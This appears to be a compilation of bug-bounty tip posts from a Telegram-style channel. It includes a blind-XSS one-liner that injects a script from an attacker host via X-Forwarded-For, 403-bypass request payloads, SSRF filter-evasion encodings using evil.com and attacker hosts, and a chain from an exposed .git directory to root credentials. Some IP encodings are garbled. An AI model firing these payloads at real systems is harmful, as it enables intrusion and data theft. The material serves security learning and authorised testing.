Blind XSS in app.pullreport.com████████ via /reviews/ratings/{uuid}

URL://
https://hackerone.com/reports/1558010

Tags:
#cybersecurity #hacking #bugbounty #bugbountytips #infosec #cybersec #blind_xss #xss

Bug Bounty Tips

Explanation : What tool you can use for for whatever bug is it

Credit: Patrik

URL://
https://blog.it-securityguard.com/pbbt.png

Tags:
#cybersecurity #bugbounty #bugbountytips #hacking #security #offsec

How to find & access Admin Panel by digging into JS files… https://medium.com/@ratnadip1998/how-to-find-access-admin-panel-by-digging-into-js-files-282d89391a2d

~Pwning

1. Recon = Found log file: web/path/wget-log
2. Found Server IP in the logs file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE

Awesome Write-Ups And POCs🌵

Link :🔗
https://resource.dr4cun0.com


#cybersecurity #hacking #bugbounty #bugbountytips #infosec

Look😃🔥

Guide for Beginner and Intermediate in Bug bounty

- Learn HTML.
Learning html is needed because as a bug bounty hunter you need this as if you are hunting on websites.

- Do a project on website development.
This will give you a good understanding of website and how website really works and functions

As of now You have good understanding of websites

- Do Learn/Practice as much you can on OWASP TOP 10, basically it contains top 10 trending vulnerability in the current year

- Go And Read Bug Reports :
This will give you an understanding of how you need to think as bug bounty hunter : https://twitter.com/Aacle_/status/1556301856317788160?s=20&t=yw73u2K7J50lrkT_JwMCVg

As a hacker you need to think like a hacker then you will be able to become a good and professional bug bounty hunter

Now it's time to try in real world so, register on any bug bounty program like hackerone, bugcrowd like that and choose any target not any but choose organization in which you will have a great chance to find bugs in beginning.

Now Best of Luck👍 & Work Hard

If you like then please share the channel like with your friends
https://t.me/updatedwithCybersecurity

Best Specification laptop/pc for Penetration tester

#bugbounty #hacking #infosec #cybersecurity


Processor : It should have atleast 6 core and 8 thread

Ram : At least 8 gb ram but I'll recommend 16 gb because you have to use different type of VMs in your laptop/pc

Storage : Give most priority to SSD because of much faster than HDD & that's why it makes your pc fast

Graphic : At least 2 gb of graphic card must needed for process like brute forcing.

If your pc have at least above specification than you are all set

Thank you For Reading 😃

You can join my telegram group if you want : https://t.me/bugbountyresources

Mobile Pentesting:-

#bugbounty #hacking #cybersecurity #infosec

https://mega.nz/folder/b7BBWQoY#yZUBoDdCo_OkC73nwiRclg

Blind XSS In X-Forwarded-For Header #bugbounty

subfinder -d http://target.com
| gau | bxss -payload '"><script src=https://hacker.xss.ht
></script>' -header "X-Forwarded-For"

#bugbountytips #infosec #cybersecurity

If you love it, you can join by channel : https://t.me/bugbountyresources

Get Reverse Shell

Using Bash, Netcat(Window & Kali), Netcat(Without -e Option), Python, Perl, Php

Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------


#cybersecurity #hacking #bugbounty #infosec #reverse_shell

Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources

Bypass 304 (Not Modified #bugbountytip

Request :

GET /admin HTTP/1.1
Host: http://target.com

If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"

➡Delete "If-None-Match" header
➡Adding random character in the end of "If-None-Match" header

Join Group For More:
https://t.me/bugbountyresources

#cybersecurity #hacking #bugbounty

Security Hardening Guides🌵

Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.

Link :🔗
https://github.com/decalage2/awesome-security-hardening

Join Group For More:
https://t.me/bugbountyresources

#cybersecurity #hacking #bugbounty #bugbountytips #infosec

🎆Bypass 403🎆 #bugbountytips

🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: http://target.com


Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: http://target.com

X-Original-URL: /admin

🏹Appending %2e after the first slash
. . .
Request :
http://target.com/admin
=> 403

Try to Bypass with
. . .
http://target.com/%2e/admin
=> 200

🏹Try add dot (.) slash (/) and semicolon (;) in the URL
. . .
http://target.com/admin
=> 403

Try to Bypass with
. . .
http://target.com/secret/
. => 200
http://target.com//secret//
=> 200
http://target.com/./secret/
.. => 200
http://target.com/;/secret
=> 200
http://target.com//;//secret
=> 200

🏹Add "..;/" after the directory name
. . .
http://target.com/admin
=> 403

Try this to bypass using ..;/
http://target.com/admin..;/
=> 200

🏹Try to uppercase the alphabet in the url
. . .
http://target.com/admin
=> 403

Try with UPPERCASE :
http://target.com/aDmIN
=> 200

🏹Via Web Cache Poisoning
. . .

GET /anything HTTP/1.1
Host: http://victim.com

X­-Original-­URL: /admin

Bug Bounty Tools List #bugbounty #cybersecurity #infosec

Server Side Request Forgery(SSRF) #bugbounty #bugbountytips #infosec #cybersecurity

🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)

🏹use Different Encoding Schemes of https://127.O.O.1
▪ Hex Encoding https://Ox7f.OxO.OxO.Ox1
▪ Octal Encoding https://0177.O.O.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.O.O.Ox1
Also use 2130706433 or 0177øWWB1
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)

🏹Use Registered Domain Names That Resolves To 127.0.0.1

🏹Embed Credentials : https://attacker@victim.com

🏹use URL Fragments '#' : https://attacker'#'victim.com (Remome the " over the hash)

🏹Use DNS Subdomain Method : https://victim.com.evil.com

🏹Use Directory Method : https://attacker.com/victim.com

🏹Exploit Redirecting The Target

🏹Change The Referrer To Burp Collaborator [Blind Exploit)

🏹Use IPv6 addresses instead of IPv4

🏹Usable Protocols:
▪gopher : //
▪file: //
▪dict://

Find Subdomain from VirusTotal🔥
Bash One-liner 🌵#bugbountytips #infosec #bugbounty

curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Web Application Security Mindmap🌱🔥

Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1

#bugbounty #bugbountytips #infosec